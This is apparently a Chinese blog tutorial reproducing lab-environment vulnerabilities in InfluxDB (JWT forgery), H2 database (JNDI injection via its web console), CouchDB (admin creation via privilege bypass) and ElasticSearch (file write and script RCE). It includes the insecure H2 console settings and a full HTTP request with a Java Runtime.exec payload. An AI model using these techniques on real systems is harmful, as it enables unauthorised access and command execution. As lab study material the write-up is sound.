服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现

目录

一、Influxdb-未授权访问-Jwt 验证不当

1、Infuxdb简介

2、安全问题

3、漏洞复现 

二、H2database-未授权访问-配置不当

1、H2database简介

2、安全问题

3、漏洞复现 

三、CouchDB-权限绕过配合RCE-漏洞

1、CouchDB简介

2、安全问题

3、漏洞复现 

四 、ElasticSearch-文件写入&RCE-漏洞

1、ElasticSearch简介

2、漏洞复现-1

3、漏洞复现-2

五、数据库安全总结导图


一、Influxdb-未授权访问-Jwt 验证不当

1、Infuxdb简介

        默认端口:8086    8088。

        InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。

        InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。

        InfluxDB 的一些主要特点包括:

  • 高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。

  • 数据保留策略:InfluxDB 允许用户设置数据保留策略,自动过期旧数据,有助于管理数据库大小和提高性能。

  • 标记和过滤:InfluxDB 支持标记,它们是键值对,可用于过滤和分组分析数据。

  • 连续查询:InfluxDB 允许用户定义连续查询,在后台运行并自动从原始数据计算聚合值。

  • InfluxDB Cloud:除了开源版本的 InfluxDB 外,还有一个名为 InfluxDB Cloud 的云托管版本,提供完全托管、可扩展的数据库即服务解决方案。

        总的来说,InfluxDB 是管理和分析时间序列数据的强大工具,在金融、医疗保健和物联网等各个行业得到广泛应用。

2、安全问题

        当用户开启了认证但未设置参数 shared-secret 时,InfluxDB会使用一个空字符串作为认证密钥来对JWT进行签名和验证。这种情况下,攻击者可以使用伪造的JWT来模拟任何用户身份,并在InfluxDB中执行SQL语句,这可能导致严重的安全问题。

3、漏洞复现 

        启动靶场环境。

        扫描环境端口,可以看到8086端口处于开启状态。

        直接在网上搜索influxdb的漏洞,就可以看到很多复现教程。

        我们打开网站并在其末尾添加下图所示内容,访问后可以看到下面的页面。

        访问下面的路径后并以post的方式上传下面的参数后会弹出一个登录框,也就是说这个操作是需要登陆后经过授权才可以执行的。

        当我们什么也不输入的时候网页会报下面的错误。

        由于其存在未授权访问漏洞,并且这个未授权访问采用的是jwt,所以可以模拟jwt来生成一个用户为admin用户,并且exp时间戳(代表着这个token的过期时间)大于当前时间的token。 

        将下面的内容在“JSON Web Tokens - jwt.io”内进行加密,并且让密钥为空。

        将上面生成出来的密钥复制,然后粘贴到数据包内。

        将数据包发送出去之后可以看到成功查询到了数据。

二、H2database-未授权访问-配置不当

1、H2database简介

        默认端口:20051 。 

        H2database是一个开源的Java嵌入式关系型数据库管理系统(RDBMS),具有轻量级、高性能、易于使用等特点。它支持标准的SQL语言和JDBC API,可以在内存或者磁盘上存储数据,同时提供了高级特性如事务管理、索引、触发器、存储过程等。

        H2database的特点包括:

  • 嵌入式:H2database可以嵌入到Java应用程序中,因此不需要独立的数据库服务器或者额外的配置,使得应用程序更加易于部署和管理。

  • 高性能:H2database被设计为轻量级数据库,因此具有非常高的性能,可以处理大量的数据操作。

  • 支持多种模式:H2database支持多种不同的模式,包括内存模式、磁盘模式、混合模式等,可以根据具体的应用场景选择最适合的存储方式。

  • 兼容性:H2database完全支持标准的SQL语言和JDBC API,因此可以方便地与其他数据库系统集成。

  • 可扩展性:H2database支持事务管理、索引、触发器、存储过程等高级特性,同时还支持使用Java代码编写自定义的函数和存储过程,因此非常灵活和可扩展。

        总的来说,H2database是一个功能丰富、易于使用、高性能的Java嵌入式关系型数据库管理系统,适用于各种不同的应用场景,包括移动应用、桌面应用、Web应用等。

2、安全问题

        H2 database自带一个Web管理页面,可以通过浏览器来访问和管理数据库。

        在Spring开发中,如果将以下选项设置为true,则可以允许外部用户访问Web管理页面,且不进行身份验证:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

        spring.h2.console.enabled选项用于启用H2 database的Web管理页面;

        spring.h2.console.settings.web-allow-others选项用于允许外部用户访问该页面。

        如果这两个选项开启则会使得Web管理页面变得容易受到攻击,利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。

3、漏洞复现 

        启动靶场环境。

        下载 JNDI-Injection-Exploit——https://github.com/welk1n/JNDI-Injection-Exploit.git


补充:

        JNDI注入是一种攻击方式,它可以利用Java命名和目录接口(JNDI)来执行远程命令执行(RCE)攻击。攻击者可以利用JNDI注入来将恶意的JNDI对象注入到目标应用程序中,并使其在应用程序尝试使用该JNDI对象时执行恶意代码。

        在使用JNDI注入进行攻击时,可以使用一些工具来自动生成恶意JNDI对象并将其注入到目标应用程序中。其中,JNDI-Injection-Exploit是一个自动化工具,它可以利用JNDI注入漏洞执行远程命令执行攻击。

        -C - 远程class文件中要执行的命令。

        -A - 服务器地址,可以是IP地址或者域名。


        下载到桌面上运行后来生成JNDI链接。

        将链接复制后打开控制终端,可以看到需要进行登陆。

        先查看服务器当前的目录。

        将下图所示的两个框内的内容更改成下面的内容。

        点击“Connect”。

        再次查看服务器的目录,发现没有任何变化。

        查看监听状态发现也没有监听到任何内容。

        这是什么原因呢?

        是因为这个jar包在进行攻击的时候是远程去调用的,但是我们是在本地去监听,所以服务器上就不会有新增内容,所以需要使用一台外网的主机来对其进行监听才会成功。

        使用外网主机再次生成并监听,将其进行复制。

        再次粘贴到指定位置后,点击“Connect”。

        此时就可以看到成功监听到了内容。

        文件目录也成功多出了一个文件。

三、CouchDB-权限绕过配合RCE-漏洞

1、CouchDB简介

        默认端口:5984。 

        CouchDB是一个面向文档的NoSQL数据库,采用JSON作为文档数据格式,并使用RESTful API提供数据访问接口。以下是CouchDB的一些特点和优势:

  • 分布式数据库:CouchDB是一个分布式数据库,支持多节点复制和同步,可以在不同的服务器之间实现数据备份和恢复。
  • 面向文档:CouchDB采用面向文档的数据模型,每个文档都是一个自包含的数据结构,可以存储任意类型的数据,无需遵循固定的表结构。
  • RESTful API:CouchDB使用RESTful API提供数据访问接口,支持HTTP协议,可通过简单的HTTP请求进行数据操作。
  • MapReduce视图:CouchDB使用MapReduce视图来处理和查询数据,可以在不同的文档之间进行关联查询和聚合计算。
  • ACID事务支持:CouchDB支持ACID事务特性,可以保证数据的一致性、可靠性和可恢复性。
  • 可扩展性:CouchDB具有良好的可扩展性和灵活性,可以根据需要进行水平和垂直扩展。
  • 开源免费:CouchDB是一款开源免费的数据库软件,可以在各种平台上免费使用和修改。

        CouchDB适用于需要存储和处理非结构化数据的应用场景,例如Web应用、移动应用、社交网络和协同办公等。由于CouchDB具有良好的可扩展性和分布式特性,因此也适用于需要处理大规模数据和高并发请求的应用场景。

2、安全问题

        由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

3、漏洞复现 

        启动靶场环境。

        访问后可以看到下面的页面。

        抓取数据包将数据包更改成下面的样式,可以看到此时是失败的。

        将数据包再次进行修改,发送包含两个roles的数据包,即可绕过限制,可以看到这时成功了,此时就成功创建了管理员账户,账户名和密码均为“vulhub”。

        进入下面的地址,输入账号和密码后点击登陆。

        可以看到成功登陆进去了。

四 、ElasticSearch-文件写入&RCE-漏洞

1、ElasticSearch简介

        默认端口:9200    9300。 

        Elasticsearch是一个基于Lucene的搜索引擎,也是一个分布式文档存储和分析引擎。以下是Elasticsearch的一些特点和优势:

  • 分布式架构:Elasticsearch采用分布式架构,可以在多个节点上存储和处理数据,支持数据水平扩展。
  • 实时搜索:Elasticsearch提供实时搜索和分析功能,可以在毫秒级别内返回搜索结果。
  • 多数据源支持:Elasticsearch支持多种数据源,包括结构化数据和非结构化数据,可以存储和处理各种类型的数据。
  • 全文搜索:Elasticsearch采用全文搜索引擎技术,支持文本分词、近似匹配和聚合分析等功能。
  • RESTful API:Elasticsearch提供RESTful API接口,可以通过HTTP请求进行数据操作和查询。
  • 大数据处理:Elasticsearch支持大规模数据的存储和处理,可以处理PB级别的数据。
  • 实时监控和分析:Elasticsearch提供实时监控和分析功能,可以对数据进行实时监控和分析,帮助用户快速发现问题和解决问题。
  • 开源免费:Elasticsearch是一款开源免费的软件,可以在各种平台上免费使用和修改。

        Elasticsearch适用于需要搜索、分析和处理大量数据的应用场景,例如日志分析、搜索引擎、电商网站、社交网络和物联网等。由于Elasticsearch具有良好的可扩展性和分布式特性,因此也适用于需要处理大规模数据和高并发请求的应用场景。

2、漏洞复现-1

        在在线靶场内找到对应环境。

        启动环境。

        9200一般为ElasticSearch的常用端口,此漏洞环境需要与中间件使用。

        发现9200端口存在elasticsearch页面,8080存在tomcat目录

        利用ElasticSearch写入后门至usr/local/tomcat/webapps/wwwroot/


        移动路径。

        配置。

        访问对应地址,使用参数f控制要写入的内容。

        访问对应路径,可以看到参数成功写入了。

3、漏洞复现-2

        在在线靶场内找到对应环境并启动。

        首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。

        访问靶场地址后抓取数据包。

        将数据包更改成下面的样式并放包。

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

        再将数据包更改成下面的样式,放包,可以看到成功执行了对应的命令。

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

五、数据库安全总结导图


此篇文章接上篇文章:https://blog.csdn.net/weixin_62808713/article/details/130444142


猜你喜欢

转载自blog.csdn.net/weixin_62808713/article/details/130451511